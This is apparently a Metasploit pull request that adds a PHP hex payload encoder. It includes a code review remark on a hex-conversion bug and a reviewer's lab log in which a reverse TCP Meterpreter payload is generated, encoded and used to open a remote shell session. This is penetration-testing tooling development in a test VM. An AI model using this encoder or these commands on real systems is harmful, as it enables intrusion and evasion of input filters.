### PR TITLE
Add modules/encoders/php/hex.rb

### PR DESCRIPTION
**Pull request by jvoisin**
This one increases the size of the payload by a bit more than a factor two, but should be able to generate a valid encoded payload in some pathological BADCHAR situations where modules/encoders/php/base64.rb can't.

### CODE REVIEW

**Comment by jvoisin** [comment]
> C: 47:  7: [Correctable] Style/Next: Use next to skip iteration.

Since the condition results in a `raise`, I don't think `next` is needed/useful.

File: modules/encoders/php/hex.rb [hunk 1]
```diff
@@ -0,0 +1,57 @@
...
+        eval(hex2bin()), increasing the size by a bit more than
+        a factor two.
+      },
+      'Author' => 'Julien Voisin',
+      'License' => BSD_LICENSE,
+      'Arch' => ARCH_PHP)
+  end
+
+  def bin_to_hex(str)
+    str.each_byte.map { |b| b.to_s(16) }.join
```
Comment (smcintyre-r7) [inline modules/encoders/php/hex.rb:23]: This has bitten me in the past. It yields incorrect results when the base-16 representation only needs a single digit. I recommend switching to `.unpack1('H*')`.

```
[1] pry(main)> "\x01\x02\x03".b.each_byte.map { |b| b.to_s(16) }.join
=> "123"
[2] pry(main)> "\x01\x02\x03".b.unpack1('H*')
=> "010203"
[3] pry(main)> 
```

**Review by smcintyre-r7 — APPROVED** [review]
I tested this out using PHP 8.3.10 both with and without compression. It worked in both cases. I pushed up a small change to fix the rubocop issues just to make the tests pass and get it into a state where we can land it. Once the tests do pass, I'll merge it.

Thanks for contributing this encoder module!

```
msf6 payload(php/meterpreter/reverse_tcp) > generate -e php/hex -f raw -o /tmp/meterpreter.php COMPRESS=true
[*] Writing 1050 bytes to /tmp/meterpreter.php...
msf6 payload(php/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 192.168.159.128:4444 
msf6 payload(php/meterpreter/reverse_tcp) > [*] Sending stage (39927 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:48286) at 2024-08-28 10:45:36 -0400

msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer    : fedora-vm
OS          : Linux fedora-vm 6.10.3-200.fc40.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug  5 14:30:00 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.128 - Meterpreter session 2 closed.  Reason: User exit
msf6 payload(php/meterpreter/reverse_tcp) > 

```

**Comment by smcintyre-r7** [comment]
# Release Notes

This adds an ascii-hex encoder for PHP with optional compression.

**Pull request merged**